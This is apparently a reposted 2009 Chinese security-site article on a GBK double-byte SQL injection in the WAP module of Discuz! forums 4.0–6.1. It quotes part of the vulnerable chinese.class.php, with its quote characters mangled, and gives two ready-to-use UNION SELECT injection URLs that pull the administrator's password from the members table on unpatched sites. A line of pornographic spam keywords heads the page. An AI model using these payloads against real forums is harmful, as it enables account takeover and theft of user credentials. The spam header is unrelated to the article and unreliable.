亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

Discuz! wap功能模塊編碼的注射漏洞

  發(fā)布時間:2009-04-18 12:12:28   作者:佚名   我要評論
影響版本: Discuz!4.0.0 Discuz!4.1.0 Discuz!5.0.0 Discuz!5.5.0 Discuz!6.0.0 Discuz!6.1.0 描述: Discuz!論壇系統(tǒng)是一個采用 PHP 和 MySQL 等其他多種數(shù)據(jù)庫構(gòu)建的高效論壇解決方案。Discuz! 在代碼質(zhì)量,運(yùn)行效率,負(fù)載能力,安全等級,功能可操控性和權(quán)限嚴(yán)密性
影響版本:
Discuz!4.0.0
Discuz!4.1.0
Discuz!5.0.0
Discuz!5.5.0
Discuz!6.0.0
Discuz!6.1.0
描述:
Discuz!論壇系統(tǒng)是一個采用 PHP 和 MySQL 等其他多種數(shù)據(jù)庫構(gòu)建的高效論壇解決方案。Discuz! 在代碼質(zhì)量,運(yùn)行效率,負(fù)載能力,安全等級,功能可操控性和權(quán)限嚴(yán)密性等方面都在廣大用戶中有良好的口碑
由于 PHP 對 多字節(jié)字符集的支持存在問題,在各種編碼相互轉(zhuǎn)換過程中,有可能引發(fā)程序溢出和程序錯誤
提交一個 '
轉(zhuǎn)意成 \'
然后轉(zhuǎn)成gbk的,\和'就變成兩個字符了
'就可以成功的引入
測試方法:
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用.風(fēng)險自負(fù)!

復(fù)制代碼
代碼如下:

if(defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('CODETABLE_DIR', DISCUZ_ROOT.'./include/tables/');
class Chinese {
var $table = '';
var $iconv_enabled = false;
var $unicode_table = array();
var $config = array
(
'SourceLang' => '',
'TargetLang' => '',
'GBtoUnicode_table' => 'gb-unicode.table',
'BIG5toUnicode_table' => 'big5-unicode.table',
);
function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) {
$this->config['SourceLang'] = $this->_lang($SourceLang);
$this->config['TargetLang'] = $this->_lang($TargetLang);
if(!function_exists(’iconv’) && $this->config['TargetLang'] != ‘BIG5′ && !$ForceTable) {
$this->iconv_enabled = true;
} else {
$this->iconv_enabled = false;
$this->OpenTable();
}
}
function _lang($LangCode) {
$LangCode = strtoupper($LangCode);
if(substr($LangCode, 0, 2) == ‘GB’) {
return ‘GBK’;
} elseif(substr($LangCode, 0, 3) == ‘BIG’) {
return ‘BIG5′;
} elseif(substr($LangCode, 0, 3) == ‘UTF’) {
return ‘UTF-8′;
} elseif(substr($LangCode, 0, 3) == ‘UNI’) {
return ‘UNICODE’;
}
}
function _hex2bin($hexdata) {
for($i=0; $i < strlen($hexdata); $i += 2) {
$bindata .= chr(hexdec(substr($hexdata, $i, 2)));
}
return $bindata;
}

chinese.class.php (utf-8不能利用)
searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit
/space.php?username=%cf'%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,password,50,51,52,53,54,55,56,57,database(),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84%20from%20cdb_members%20where%20uid=1/*
直接放在url后面可以爆出id=1的用戶密碼,還可以自己根據(jù)需要更改,要注意一點(diǎn)的是,目標(biāo)必須開了WAP,而且沒有打上補(bǔ)丁,WAP瀏覽吧

相關(guān)文章

最新評論